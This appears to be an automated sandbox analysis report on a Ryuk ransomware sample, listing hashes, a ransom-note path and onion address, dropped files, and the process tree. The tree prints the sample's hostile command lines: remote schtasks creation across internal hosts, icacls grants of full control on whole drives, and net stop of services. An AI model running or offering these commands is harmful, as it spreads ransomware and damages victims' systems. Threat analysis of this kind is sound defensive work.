Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
113s -
max time network
142s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
23/03/2021, 15:25
Static task
static1
Behavioral task
behavioral1
Sample
xxx.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
xxx.exe
Resource
win10v20201028
General
-
Target
xxx.exe
-
Size
208KB
-
MD5
3c08d1e5233c623bfc854879173544de
-
SHA1
a1add1d1e80d84440fc013abcc754f1bdddf3a20
-
SHA256
956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5
-
SHA512
01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943
Malware Config
Extracted
C:\users\Public\RyukReadMe.html
ryuk
http://lgjpuim5fe3pejmllygcffape3djui6k2a5pcbpuyvps3h4ajb7yf4id.onion
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Executes dropped EXE 3 IoCs
pid Process 2000 wtLIEtzKGrep.exe 652 gWqMBNtPvlan.exe 2608 ScKDbDhotlan.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4444 icacls.exe 4456 icacls.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI xxx.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\access-bridge-64.jar xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar xxx.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\LoanAmortization.xltx xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\RyukReadMe.html xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\css\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc xxx.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sql90.xsl xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js xxx.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\mip.exe.mui xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019MSDNR_Retail-ul-oob.xrm-ms xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\es\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODDBS.DLL xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\ui-strings.js xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\et-EE\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ppd.xrm-ms xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\RedAndBlackReport.dotx xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BOOKOS.TTF xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Graph.exe.manifest xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.EXCEL.16.1033.hxn xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-awt.xml xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\JPEGIM32.FLT xxx.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access_output\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXT xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_duplicate_18.svg xxx.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\splash.gif xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_col.hxc xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_COL.HXC xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ppd.xrm-ms xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-ul-oob.xrm-ms xxx.exe File opened for modification C:\Program Files\7-Zip\Lang\mn.txt xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2XML.XSL xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.POWERPNT.16.1033.hxn xxx.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\PlayStore_icon.svg xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RIntLoc.en-us.16.msi xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ppd.xrm-ms xxx.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\RyukReadMe.html xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\RyukReadMe.html xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\ui-strings.js xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\ui-strings.js xxx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif xxx.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\RyukReadMe.html xxx.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar xxx.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4748 schtasks.exe 1448 schtasks.exe 2156 schtasks.exe 5088 schtasks.exe 1768 schtasks.exe 4524 schtasks.exe 4656 schtasks.exe 4732 schtasks.exe 4432 schtasks.exe 4668 schtasks.exe 4864 schtasks.exe 1764 schtasks.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 644 xxx.exe 644 xxx.exe 644 xxx.exe 644 xxx.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 644 wrote to memory of 2000 644 xxx.exe 78 PID 644 wrote to memory of 2000 644 xxx.exe 78 PID 644 wrote to memory of 2000 644 xxx.exe 78 PID 644 wrote to memory of 652 644 xxx.exe 79 PID 644 wrote to memory of 652 644 xxx.exe 79 PID 644 wrote to memory of 652 644 xxx.exe 79 PID 644 wrote to memory of 2608 644 xxx.exe 80 PID 644 wrote to memory of 2608 644 xxx.exe 80 PID 644 wrote to memory of 2608 644 xxx.exe 80 PID 644 wrote to memory of 4444 644 xxx.exe 81 PID 644 wrote to memory of 4444 644 xxx.exe 81 PID 644 wrote to memory of 4444 644 xxx.exe 81 PID 644 wrote to memory of 4456 644 xxx.exe 83 PID 644 wrote to memory of 4456 644 xxx.exe 83 PID 644 wrote to memory of 4456 644 xxx.exe 83 PID 644 wrote to memory of 4852 644 xxx.exe 85 PID 644 wrote to memory of 4852 644 xxx.exe 85 PID 644 wrote to memory of 4852 644 xxx.exe 85 PID 644 wrote to memory of 4796 644 xxx.exe 87 PID 644 wrote to memory of 4796 644 xxx.exe 87 PID 644 wrote to memory of 4796 644 xxx.exe 87 PID 644 wrote to memory of 4884 644 xxx.exe 89 PID 644 wrote to memory of 4884 644 xxx.exe 89 PID 644 wrote to memory of 4884 644 xxx.exe 89 PID 4852 wrote to memory of 4844 4852 net.exe 91 PID 4852 wrote to memory of 4844 4852 net.exe 91 PID 4852 wrote to memory of 4844 4852 net.exe 91 PID 644 wrote to memory of 4944 644 xxx.exe 92 PID 644 wrote to memory of 4944 644 xxx.exe 92 PID 644 wrote to memory of 4944 644 xxx.exe 92 PID 4796 wrote to memory of 5056 4796 net.exe 94 PID 4796 wrote to memory of 5056 4796 net.exe 94 PID 4796 wrote to memory of 5056 4796 net.exe 94 PID 4884 wrote to memory of 4484 4884 net.exe 95 PID 4884 wrote to memory of 4484 4884 net.exe 95 PID 4884 wrote to memory of 4484 4884 net.exe 95 PID 4944 wrote to memory of 4792 4944 net.exe 96 PID 4944 wrote to memory of 4792 4944 net.exe 96 PID 4944 wrote to memory of 4792 4944 net.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\xxx.exe"C:\Users\Admin\AppData\Local\Temp\xxx.exe"1⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Users\Admin\AppData\Local\Temp\wtLIEtzKGrep.exe"C:\Users\Admin\AppData\Local\Temp\wtLIEtzKGrep.exe" 9 REP2⤵
- Executes dropped EXE
PID:2000 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.73 /TN VhdJgMX /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4656
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.82 /TN TGctyK5 /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4748
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.77 /TN 5EFJcFL /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4732
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.72 /TN p33jl25 /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4432
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.95 /TN jzKupPi /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4668
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.86 /TN qxhyim9 /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1448
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.81 /TN sGCrDdL /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2156
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.70 /TN AbdzP7q /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:5088
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.88 /TN 0LDjBLF /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1768
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.66 /TN eMHGKXY /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4864
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.74 /TN lWGEEzd /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4524
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.71 /TN JceVIbO /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\gWqMBNtPvlan.exe"C:\Users\Admin\AppData\Local\Temp\gWqMBNtPvlan.exe" 8 LAN2⤵
- Executes dropped EXE
PID:652
-
-
C:\Users\Admin\AppData\Local\Temp\ScKDbDhotlan.exe"C:\Users\Admin\AppData\Local\Temp\ScKDbDhotlan.exe" 8 LAN2⤵
- Executes dropped EXE
PID:2608
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4444
-
-
C:\Windows\SysWOW64\icacls.exeicacls "D:\*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4456
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:4844
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:5056
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:4484
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:4792
-
-